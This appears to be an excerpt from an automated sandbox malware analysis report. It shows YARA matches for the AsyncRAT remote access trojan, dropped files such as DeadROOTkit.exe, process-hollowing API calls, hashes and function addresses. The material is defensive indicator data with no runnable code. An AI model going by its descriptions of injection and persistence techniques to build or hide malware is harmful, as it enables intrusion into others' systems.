                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\Public\Deadsvchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\Public\DeadXClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        .NET source code contains very large strings
                        Source: 1.exe.0.dr, -Program-.csLong String: Length: 253952
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344F0C6D NtWriteVirtualMemory,9_2_00007FFD344F0C6D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344F0A4E NtUnmapViewOfSection,9_2_00007FFD344F0A4E
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344F0F30 NtSetContextThread,9_2_00007FFD344F0F30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344F0FF4 NtResumeThread,9_2_00007FFD344F0FF4
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_tldlbnvr.cn1.ps1
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC05B002_2_00007FF6FAC05B00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC06A4C2_2_00007FF6FAC06A4C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC006D42_2_00007FF6FAC006D4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEFBB82_2_00007FF6FABEFBB8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABFE3B82_2_00007FF6FABFE3B8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF03D82_2_00007FF6FABF03D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF5B502_2_00007FF6FABF5B50
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF83502_2_00007FF6FABF8350
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC065002_2_00007FF6FAC06500
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF7C982_2_00007FF6FABF7C98
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE7C702_2_00007FF6FABE7C70
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC03A102_2_00007FF6FAC03A10
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC006D42_2_00007FF6FAC006D4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF2A282_2_00007FF6FABF2A28
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF01CC2_2_00007FF6FABF01CC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF12C02_2_00007FF6FABF12C0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF32F02_2_00007FF6FABF32F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF9AA02_2_00007FF6FABF9AA0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC098082_2_00007FF6FAC09808
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEFFC82_2_00007FF6FABEFFC8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE874B2_2_00007FF6FABE874B
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE911D2_2_00007FF6FABE911D
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE88EB2_2_00007FF6FABE88EB
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABFD8A42_2_00007FF6FABFD8A4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF2E2C2_2_00007FF6FABF2E2C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEFDBC2_2_00007FF6FABEFDBC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF05DC2_2_00007FF6FABF05DC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF25F02_2_00007FF6FABF25F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC05D7C2_2_00007FF6FAC05D7C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABFDD382_2_00007FF6FABFDD38
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC03EAC2_2_00007FF6FAC03EAC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABF16582_2_00007FF6FABF1658
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC016742_2_00007FF6FAC01674
                        Source: C:\Users\user\AppData\Local\Temp\1.exeCode function: 4_2_00007FFD344E0C114_2_00007FFD344E0C11
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC06A4C5_2_00007FF6FAC06A4C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF2E2C5_2_00007FF6FABF2E2C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEFBB85_2_00007FF6FABEFBB8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABFE3B85_2_00007FF6FABFE3B8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF03D85_2_00007FF6FABF03D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF5B505_2_00007FF6FABF5B50
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF83505_2_00007FF6FABF8350
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC065005_2_00007FF6FAC06500
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF7C985_2_00007FF6FABF7C98
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE7C705_2_00007FF6FABE7C70
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC03A105_2_00007FF6FAC03A10
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC006D45_2_00007FF6FAC006D4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF2A285_2_00007FF6FABF2A28
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF01CC5_2_00007FF6FABF01CC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC05B005_2_00007FF6FAC05B00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF12C05_2_00007FF6FABF12C0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF32F05_2_00007FF6FABF32F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF9AA05_2_00007FF6FABF9AA0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC098085_2_00007FF6FAC09808
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEFFC85_2_00007FF6FABEFFC8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE874B5_2_00007FF6FABE874B
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE911D5_2_00007FF6FABE911D
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE88EB5_2_00007FF6FABE88EB
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABFD8A45_2_00007FF6FABFD8A4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEFDBC5_2_00007FF6FABEFDBC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF05DC5_2_00007FF6FABF05DC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF25F05_2_00007FF6FABF25F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC05D7C5_2_00007FF6FAC05D7C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABFDD385_2_00007FF6FABFDD38
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC006D45_2_00007FF6FAC006D4
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC03EAC5_2_00007FF6FAC03EAC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABF16585_2_00007FF6FABF1658
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC016745_2_00007FF6FAC01674
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD8F787B305_2_00007FFD8F787B30
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD8FD99F905_2_00007FFD8FD99F90
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD934818A05_2_00007FFD934818A0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD936133305_2_00007FFD93613330
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A149C5_2_00007FFD935A149C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A24EB5_2_00007FFD935A24EB
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD936672005_2_00007FFD93667200
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A11815_2_00007FFD935A1181
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1C125_2_00007FFD935A1C12
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A21D55_2_00007FFD935A21D5
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935B76305_2_00007FFD935B7630
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A13DE5_2_00007FFD935A13DE
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935E99A05_2_00007FFD935E99A0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935ED9605_2_00007FFD935ED960
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1FE65_2_00007FFD935A1FE6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A15555_2_00007FFD935A1555
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A21F35_2_00007FFD935A21F3
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A15915_2_00007FFD935A1591
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A15415_2_00007FFD935A1541
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935E5DC05_2_00007FFD935E5DC0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935CBD805_2_00007FFD935CBD80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935EDE305_2_00007FFD935EDE30
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935C62905_2_00007FFD935C6290
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1AD75_2_00007FFD935A1AD7
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A11725_2_00007FFD935A1172
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9361A7405_2_00007FFD9361A740
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1EE75_2_00007FFD935A1EE7
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1D985_2_00007FFD935A1D98
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A8BE05_2_00007FFD935A8BE0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1A0F5_2_00007FFD935A1A0F
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935D8AA05_2_00007FFD935D8AA0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A16FE5_2_00007FFD935A16FE
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1CC15_2_00007FFD935A1CC1
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1B545_2_00007FFD935A1B54
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A262B5_2_00007FFD935A262B
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A17F85_2_00007FFD935A17F8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935E0F905_2_00007FFD935E0F90
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A27165_2_00007FFD935A2716
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A16135_2_00007FFD935A1613
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9360CDA05_2_00007FFD9360CDA0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A143D5_2_00007FFD935A143D
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF912B05_2_00007FFD9DF912B0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF96EFC5_2_00007FFD9DF96EFC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF91BB05_2_00007FFD9DF91BB0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF953F05_2_00007FFD9DF953F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF92FF05_2_00007FFD9DF92FF0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF9F86C5_2_00007FFD9DF9F86C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF925305_2_00007FFD9DF92530
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF95D305_2_00007FFD9DF95D30
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DF98D905_2_00007FFD9DF98D90
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DFE35105_2_00007FFD9DFE3510
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DFCBDA05_2_00007FFD9DFCBDA0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DFCFDC05_2_00007FFD9DFCFDC0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B89C85_2_00007FFD9F3B89C8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3BA4345_2_00007FFD9F3BA434
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B9AA85_2_00007FFD9F3B9AA8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3BB6BC5_2_00007FFD9F3BB6BC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B96B05_2_00007FFD9F3B96B0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3E06905_2_00007FFD9F3E0690
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B57505_2_00007FFD9F3B5750
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3BA0E85_2_00007FFD9F3BA0E8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B830C5_2_00007FFD9F3B830C
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C5A00186_2_1C5A0018
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59BD506_2_1C59BD50
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59BF5C6_2_1C59BF5C
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C5A23786_2_1C5A2378
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F71466_2_00007FFD344F7146
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F0E796_2_00007FFD344F0E79
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F7EF26_2_00007FFD344F7EF2
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F17996_2_00007FFD344F1799
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F6CB27_2_00007FFD344F6CB2
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F12E97_2_00007FFD344F12E9
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F5F067_2_00007FFD344F5F06
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F21D17_2_00007FFD344F21D1
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F0EFA7_2_00007FFD344F0EFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344E38FA9_2_00007FFD344E38FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344E3DB19_2_00007FFD344E3DB1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344E39FA9_2_00007FFD344E39FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344EE3399_2_00007FFD344EE339
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344E63D19_2_00007FFD344E63D1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344E38539_2_00007FFD344E3853
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344EC0059_2_00007FFD344EC005
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34781A219_2_00007FFD34781A21
                        Source: Joe Sandbox ViewDropped File: C:\Users\Public\DeadCodeRootKit.exe 18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
                        Source: Joe Sandbox ViewDropped File: C:\Users\Public\DeadROOTkit.exe 5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                        Source: Joe Sandbox ViewDropped File: C:\Users\Public\DeadXClient.exe 4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361CE79 appears 49 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361D551 appears 69 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9F3BDAF0 appears 46 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361CD8F appears 330 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9DFC3770 appears 95 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD935A132A appears 519 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361CF69 appears 31 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FF6FABE1DB0 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361D545 appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9DFC3700 appears 50 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FF6FABE1DF0 appears 110 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9F3BDC10 appears 83 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361CDA1 appears 1188 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9361CD9B appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: String function: 00007FFD9DFD4180 appears 86 times
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: DeadCodeRootKit.exe.4.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: python3.dll.2.drStatic PE information: No import functions for PE file found
                        Source: aoKTzGQSRP.exe, 00000000.00000002.2155452715.0000000003FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs aoKTzGQSRP.exe
                        Source: aoKTzGQSRP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: unknownProcess created: Commandline size = 5251
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\Deadsvchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\DeadXClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: libcrypto-3.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
                        Source: libssl-3.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
                        Source: python311.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
                        Source: unicodedata.pyd.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
                        Source: DeadXClient.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadXClient.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadXClient.exe.4.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Deadsvchost.exe.6.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
